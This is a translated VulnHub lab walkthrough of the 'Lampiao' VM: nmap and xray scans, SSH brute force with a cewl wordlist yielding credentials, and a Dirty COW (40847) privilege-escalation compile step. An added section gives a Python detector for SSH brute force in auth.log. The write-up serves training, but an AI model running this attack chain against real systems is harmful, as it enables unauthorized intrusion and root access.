vulnhub Pentest Diary 04: Lampiao

Preface

⏰Date: 2023.7.16
🗺️Target VM: https://download.vulnhub.com/lampiao/Lampiao.zip
⚠️Everything in this article was done in a simulated target-VM environment; never use it against real systems without authorization.
🙏My skills are limited; if you spot mistakes please point them out. Thanks for reading!
🎉Feel free to follow🔍, like👍, bookmark⭐️ and comment📝

Information gathering

Any of the following will discover the host:

arp-scan
netdiscover -i eth0 -r 192.168.58.1/24
nmap -sn 192.168.58.1/24

masscan to see which ports are open, then nmap to probe the open ports further:

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -T4 -A -p T:22,80,1898 -v 192.168.58.149 
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA)
|   2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA)
|   256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA)
|_  256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519)
80/tcp   open  http?
| fingerprint-strings: 
|   NULL: 
|     _____ _ _ 
|     |_|/ ___ ___ __ _ ___ _ _ 
|     \x20| __/ (_| __ \x20|_| |_ 
|     ___/ __| |___/ ___|__,_|___/__, ( ) 
|     |___/ 
|     ______ _ _ _ 
|     ___(_) | | | |
|     \x20/ _` | / _ / _` | | | |/ _` | |
|_    __,_|__,_|_| |_|
1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Lampi\xC3\xA3o
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:0C:29:21:69:85 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.011 days (since Sun Jul 16 10:53:18 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 192.168.58.149

NSE: Script Post-scanning.
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.18 seconds
           Raw packets sent: 26 (1.938KB) | Rcvd: 18 (1.410KB)

Port 80 has nothing of interest.
Moving on to 1898.
Clicking an image shows that the URL carries an id value.
Try changing it.
audio.m4a is an audio clip that says "user tiago".
qrc.png is a QR code; scanning it gives nothing useful.
Page three has an mp3; what, we have to listen to a song too?
Listened to it, quite cheerful, but nothing to be made of it.
Scanned the directories.
xray passive scanning is another option and may turn up CVEs:

xray.exe webscan --listen 127.0.0.1:7777 --html-output lam.html

____  ___.________.    ____.   _____.___.
\   \/  /\_   __   \  /  _  \  \__  |   |
 \     /  |    _  _/ /  /_\  \  /   |   |
 /     \  |    |   \/    |    \ \____   |
\___/\  \ |____|   /\____|_   / / _____/
      \_/       \_/        \_/  \/

[INFO] 2023-07-16 12:02:35 [collector:mitm.go:215] loading cert from ./ca.crt and ./ca.key
[INFO] 2023-07-16 12:02:35 [collector:mitm.go:271] starting mitm server at 127.0.0.1:7777
[INFO] 2023-07-16 12:02:39 [default:dispatcher.go:444] processing GET http://192.168.58.149:1898/?q=node/1
[Vuln: dirscan]
Target           "http://192.168.58.149:1898/README.txt"
VulnType         "debug/readme"
Payload          "/README.txt"

[INFO] 2023-07-16 12:02:40 script poc-yaml-pbootcms-rce-cve-2022-32417 run payload linux
[Vuln: dirscan]
Target           "http://192.168.58.149:1898/LICENSE.txt"
VulnType         "debug/readme"
Payload          "/LICENSE.txt"

[WARN] 2023-07-16 12:02:40 [sqldet:detector.go:239] different response status code 404/200
[Vuln: dirscan]
Target           "http://192.168.58.149:1898/CHANGELOG.txt"
VulnType         "debug/readme"
Payload          "/CHANGELOG.txt"

[INFO] 2023-07-16 12:02:40 script poc-yaml-pbootcms-rce-cve-2022-32417 run payload windows
[Vuln: dirscan]
Target           "http://192.168.58.149:1898/INSTALL.txt"
VulnType         "debug/readme"
Payload          "/INSTALL.txt"

[INFO] 2023-07-16 12:02:40 script poc-yaml-gurock-testrail-cve-2021-40875-info-leak run payload req01
[*] scanned: 0, pending: 1, requestSent: 510, latency: 100.79ms, failedRatio: 0.00%
[INFO] 2023-07-16 12:02:41 script poc-yaml-gurock-testrail-cve-2021-40875-info-leak run payload req02
[Vuln: dirscan]
Target           "http://192.168.58.149:1898/MAINTAINERS.txt"
VulnType         "debug/readme"
Payload          "/MAINTAINERS.txt"

[INFO] 2023-07-16 12:02:41 script poc-yaml-wanhu-ezoffice-documentedit-sqli run payload oracle
[INFO] 2023-07-16 12:02:41 script poc-yaml-wanhu-ezoffice-documentedit-sqli run payload mysql
[INFO] 2023-07-16 12:02:41 script poc-yaml-wanhu-ezoffice-documentedit-sqli run payload mssql
[Vuln: dirscan]
Target           "http://192.168.58.149:1898/web.config"
VulnType         "config/web"
Payload          "/web.config"

[Vuln: dirscan]
Target           "http://192.168.58.149:1898/UPGRADE.txt"
VulnType         "debug/readme"
Payload          "/UPGRADE.txt"

[INFO] 2023-07-16 12:02:41 script poc-yaml-circarlife-scada-cve-2018-12634-info-leak run payload req01
[INFO] 2023-07-16 12:02:41 script poc-yaml-circarlife-scada-cve-2018-12634-info-leak run payload req02
[INFO] 2023-07-16 12:02:41 script poc-yaml-php-proxy-cve-2018-19458-fileread run payload linux
[INFO] 2023-07-16 12:02:41 script poc-yaml-php-proxy-cve-2018-19458-fileread run payload win
[INFO] 2023-07-16 12:02:41 script poc-yaml-adobe-experience-manager-cve-2019-8086-xxe run payload linux
[INFO] 2023-07-16 12:02:42 script poc-yaml-adobe-experience-manager-cve-2019-8086-xxe run payload win
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path01
[INFO] 2023-07-16 12:02:42 script poc-yaml-glpi-telemetry-cve-2021-39211-info-leak run payload req01
[INFO] 2023-07-16 12:02:42 script poc-yaml-glpi-telemetry-cve-2021-39211-info-leak run payload req02
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path02
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path03
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path04
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path05
[INFO] 2023-07-16 12:02:42 script poc-yaml-alibaba-nacos-v1-auth-bypass run payload hasPrefix
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path06
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path07
[INFO] 2023-07-16 12:02:42 script poc-yaml-alibaba-nacos-v1-auth-bypass run payload nonePrefix
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path08
[INFO] 2023-07-16 12:02:42 script poc-yaml-mantisbt-cve-2017-7615-unauth run payload req01
[INFO] 2023-07-16 12:02:42 script poc-yaml-mantisbt-cve-2017-7615-unauth run payload req02
[INFO] 2023-07-16 12:02:42 script poc-yaml-mantisbt-cve-2017-7615-unauth run payload req03
[INFO] 2023-07-16 12:02:42 script poc-yaml-mantisbt-cve-2017-7615-unauth run payload req04
[INFO] 2023-07-16 12:02:42 script poc-yaml-mantisbt-cve-2017-7615-unauth run payload req05
[INFO] 2023-07-16 12:02:42 script poc-yaml-manageengine-servicedesk-cve-2017-11512-lfi run payload windows
[INFO] 2023-07-16 12:02:42 script poc-yaml-kevinlab-bems-backdoor-cve-2021-37292 run payload p1
[INFO] 2023-07-16 12:02:43 script poc-yaml-kevinlab-bems-backdoor-cve-2021-37292 run payload p2
[INFO] 2023-07-16 12:02:43 script poc-yaml-manageengine-servicedesk-cve-2017-11512-lfi run payload linux
[INFO] 2023-07-16 12:02:43 script poc-yaml-laravel-filemanager-cve-2022-40734-path-traversal run payload req01
[INFO] 2023-07-16 12:02:43 script poc-yaml-laravel-filemanager-cve-2022-40734-path-traversal run payload req02
[INFO] 2023-07-16 12:02:43 [default:dispatcher.go:444] processing GET http://192.168.58.149:1898/
[*] All pending requests have been scanned
[*] scanned: 2, pending: 0, requestSent: 1608, latency: 38.83ms, failedRatio: 0.00%

So far all we have is the username tiago, so let's try brute-forcing port 22.

SSH brute force

With this many pages, cewl can crawl the site text and turn it into a password dictionary.
Result: login: tiago password: Virgulino
Connect over SSH.
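The credential guessing above leaves a distinctive trail in the target's sshd log. As an added example that is not from the original post, here is a small detector over constructed auth.log lines (host name, PIDs and the 192.168.58.100 source address are made up) that flags a source whose failed logins reach a threshold inside a sliding window, and then flags a subsequent successful login from that same source.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines (not from the original post): a burst of
# failures from one source, then a success from that same source.
SAMPLE_AUTH_LOG = """\
Jul 16 11:30:01 lampiao sshd[2011]: Failed password for tiago from 192.168.58.100 port 40012 ssh2
Jul 16 11:30:01 lampiao sshd[2013]: Failed password for tiago from 192.168.58.100 port 40014 ssh2
Jul 16 11:30:02 lampiao sshd[2015]: Failed password for invalid user admin from 192.168.58.100 port 40016 ssh2
Jul 16 11:30:02 lampiao sshd[2017]: Failed password for tiago from 192.168.58.100 port 40018 ssh2
Jul 16 11:30:04 lampiao sshd[2021]: Accepted password for tiago from 192.168.58.100 port 40022 ssh2
Jul 16 11:45:10 lampiao sshd[2101]: Accepted publickey for tiago from 192.168.58.1 port 51000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

def parse_ts(ts, year=2023):
    # syslog timestamps carry no year; the caller supplies it (assumed 2023 here)
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(log_text, threshold=4, window_seconds=60):
    """Return alerts: one per source IP whose failures within `window_seconds`
    reach `threshold`, and one more if that IP then logs in successfully."""
    failures = defaultdict(list)   # ip -> timestamps of recent failed logins
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, user, when = m["ip"], m["user"], parse_ts(m["ts"])
        if m["result"] == "Failed":
            failures[ip].append(when)
            # keep only failures that fall inside the sliding window
            failures[ip] = [t for t in failures[ip] if (when - t).total_seconds() <= window_seconds]
            if len(failures[ip]) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, user))
        elif ip in flagged:
            # a success right after a burst of failures: the guess probably landed
            alerts.append(("bruteforce_success", ip, user))
    return alerts
```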

Privilege escalation

Go straight for Dirty COW.
Search for 40847; the usage instructions are included.
Upload the file to the target.

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
-Wall      #commonly used; enables all the useful warnings GCC can provide
-pedantic  #issues all warnings demanded by the ANSI/ISO C standard
-O2        #one of the compiler's four optimization levels: -O0 is no optimization, -O1 is the default, -O3 is the highest
-std=c++11 #compile according to the C++2011 standard
-pthread   #on Linux, multithreaded code needs the pthread library linked in
